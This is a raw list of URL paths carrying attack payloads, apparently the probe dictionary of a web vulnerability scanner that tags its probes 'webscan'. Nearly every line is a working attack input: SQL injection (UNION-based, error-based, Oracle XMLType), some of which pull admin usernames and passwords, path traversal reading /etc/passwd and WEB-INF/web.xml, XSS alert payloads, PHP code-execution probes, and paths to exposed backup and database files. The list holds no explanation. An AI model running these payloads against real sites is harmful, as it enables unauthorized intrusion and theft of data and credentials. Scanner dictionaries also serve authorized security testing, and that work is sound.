/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/CmxLogin.php?t=14431680671059
/Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
/Comm/UploadFile/webUpload.aspx?AttId=x.cer&FilePath=/../web
/CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-30002%20UNION%20SELECT%201,concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version()),3,4,5
/Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorporateCulture/kaizen_download.aspx?file_id=1')%20and%20(select%20char(86)%2bchar(76))%3E0--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/DataBase/%23$DB.mdb
/Databases/0791idc.mdb
/Databases/asp99cms.mdb
/Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/Directory/iframeAgencyFunctions.jsp?department_no=1'%20UNION%20ALL%20SELECT%20NULL,CHR(58)%7C%7CCHR(113)%7C%7CCHR(110)%7C%7CCHR(116)%7C%7CCHR(58)%7C%7CCHR(97)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(117)%7C%7CCHR(112)%7C%7CCHR(58),NULL%20FROM%20DUAL--%20
/Directory/showLeader.jsp?LeadId=-1%20UNION%20ALL%20SELECT%20NULL,CHR(58)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(89)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(58),NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&department_id=null&department_name=&department_no=1
/Directory/showNsjg.jsp?NsjgId=-1%20UNION%20ALL%20SELECT%20NULL,CHR(58)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(85)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(58)%20FROM%20DUAL--%20&department_id=&department_name=&department_no=013628024
/Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/DocCenterService/image?photo_id=10443&photo_size=../../../../../../../../../../etc/passwd%00
/Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/DownloadShow.asp
/Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
/ErrorInfDownLoad?errorName=/../../../../was/webroot/WEB-INF/web.xml
/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/ExportToExcel?method=txtDownload&destFile=/../../../../was/webroot/WEB-INF/web.xml
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
/FCKeditor/editor/filemanager/browser/default/browser.html/fckeditor/editor/dialog/fck_about.html
/blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
/bom.php?dir=.
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/boot/phpConfig/tb_admin.txt
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/browse/browse_user_db.php
/bugfree/install/index.php?action=upgraded
/bulletin/bulletin_template_show.aspx?id=(select%20char(86))
/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
/cache/bak_mysql.txt
/cacti.sql
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
/capturedownload.php?action=1&picpath=config.ini
/card.php/login.php/login.php/login.php/login.php?cardNumber=-1%27%20UNION%20SELECT%201,md5(0x045154),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
/card_search.php/login.php/login.php/login.php?cardNumber=-1'%20UNION%20SELECT%201,md5(0x045154),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
/card_sold_print.php/login.php/login.php/login.php?ID=9999999999'%20UNION%20SELECT%201,md5(0x045154),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
/cart.aspx?act=buy&bindingid=1%20and%201=char(106)--
/cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
/cartstep1.aspx?act=area&id=@@version
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/category/xwxc/p/p/p/p/p/p/p/$%7B@assert(exit(md5(0x41545)))%7D/p/p/1.html
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%204391%20from(select%20count(*),concat(0x7e,(mid((ifnull(cast(md5(0x4515)%20as%20char),0x20)),1,50)),0x7e,floor(rand(0)*2))x%20from%20information_schema.character_sets%20group%20by%20x)a)%20and%20'1'='1
/cctrl/admin/purview/purview.php
/cctrl/backup/index.php
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/centreon/include/views/graphs/graphStatus/displayServiceStatus.php?session_id='%20or%201=1%20--%20/**&template_id='%20UNION%20ALL%20SELECT%201,2,3,4,5,CHAR(59,%2032,%2099,97,116,32,47,101,116,99,47,112,97,115,115,119,100,%2059),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20/**%20
/cfg/user.cfg.ini
/cgi-bin/
/cgi-bin/admin/configfile.cgi
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
/cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/cms/ad/column_tree_xml_admin.jsp?_web_id=1'%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7179647371,0x6141534f415555665645,0x717a687371),NULL,NULL,NULL,NULL,NULL%23
/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
/cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/common/tree_json_data.jsp?type=JSON_DATA_GROUPDEPTUSER&id=1'%20UNION%20ALL%20SELECT%20CHR(113)%7C%7CCHR(108)%7C%7CCHR(97)%7C%7CCHR(104)%7C%7CCHR(113)%7C%7CCHR(118)%7C%7CCHR(108)%7C%7CCHR(66)%7C%7CCHR(80)%7C%7CCHR(112)%7C%7CCHR(106)%7C%7CCHR(85)%7C%7CCHR(111)%7C%7CCHR(97)%7C%7CCHR(71)%7C%7CCHR(113)%7C%7CCHR(108)%7C%7CCHR(110)%7C%7CCHR(112)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/conf/system.xml
/cms/framework/dbfile/createdbfile.jsp
/cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
/cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/testsql.jsp
/cms/webapp/critic/p_criticfrontlist.jsp?TID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,0x6F6B6A3A6F6B6A,NULL,NULL%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
/comments.php?id=3a&tablepre=boka_members+where+1%3d1+and+(select+1+from+(select+count(*)%2cconcat((select+concat(0x3a%2cmd5(1122)%2c0x3a)+from+boka_members+where+uid%3d1)%2cfloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/common.inc
/common/activeX/activeX.php?meetingId=11&userId=11/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
/common/edu/call.php?meetingId=11/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/common/edu/index.php?isGet=1&deal=contact&userId=11/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/common/mail.php/xxx'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='?a=VGsxTlpXVjBhVzVuVTJOb1pXUjFiR1U9&c=a&g=a
/common/monitor/index.php?userId=111/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/common/web_meeting/ajax.php?module=ajaxGetGroupUserByGroupId&gId=1,(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/common/web_meeting/downMeetingRecord.php?name=../../../etc/passwd
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
/conf/
/conferences/currentconf.php?deptname=-1'%20and%201=2%20UNION%20SELECT%201,concat(0x7c,md5(1122),0x7c),3,4,5,6,7,8%23
/conferences/journal.php?confid=-1%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7%23
/conferences/logoconf.php?confid=-1%20UNION%20SELECT%201,concat(0x7c,md5(1122),0x7c),3,4,5,6,7,8%20%23
/config.inc.php.bak
/config/
/config/cn/config.php?iDeviceID=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x3A0040003A00,IFNULL(CAST(md5(0x7765627363616e)%20AS%20CHAR),0x20),0x3A0040003A00),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
/config/cn/config.php?iDeviceID=-1%20UNION%20SELECT%201%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/config/cn/tree.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/config/config_global.php.bak
/config/config_ucenter.php.bak
/config/dbconfig.ini
/configright.php?nodeId=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15
/configright_decoder.php?nodeId=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/conn.inc
/connect.inc
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/console/
/console/login/LoginForm.jsp
/content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
/content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/crossdomain.xml
/ctop/person/common/get_file.jsp?file_path=//WEB-INF/web.xml
/ctop/person/common/get_file.jsp?file_path=/DocumentShow.jsp
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/data.mdb
/data/
/data/%23data.asp
/data/%23data.mdb
/data/admin.mdb
/data/article.mdb
/data/common.inc.php.bak
/data/mysql_error_trace.inc
/database.inc
/database/
/databases/4dsdo0/%254&764/%23fgf&0O.mdb
/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
/datas/
/db.inc
/db/
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/decodermanage.php?NodeID=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x3A0040003A00,IFNULL(CAST(md5(0x7765627363616e)%20AS%20CHAR),0x20),0x3A0040003A00),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
/decodermanage.php?NodeID=-11%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%23
/dede/
/defaultroot/boardroom/iWebOfficeSign_sql/DocumentEdit.jsp?RecordID=-2074%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%28SELECT%20CONCAT%280x717765727479%2C0x3A746573743A%2C0x7168726371%29%20FROM%20ezoffice.org_employee%20LIMIT%2021%2C1%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&Template=0&FileType=.doc&EditType=1&UserName=1&moduleType=1&saveHtmlImage=1&saveDocFile=1
/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
/defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
/demo.php?time=alert(String.fromCharCode(52,%2050,%2056,%2055,%2051))
/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
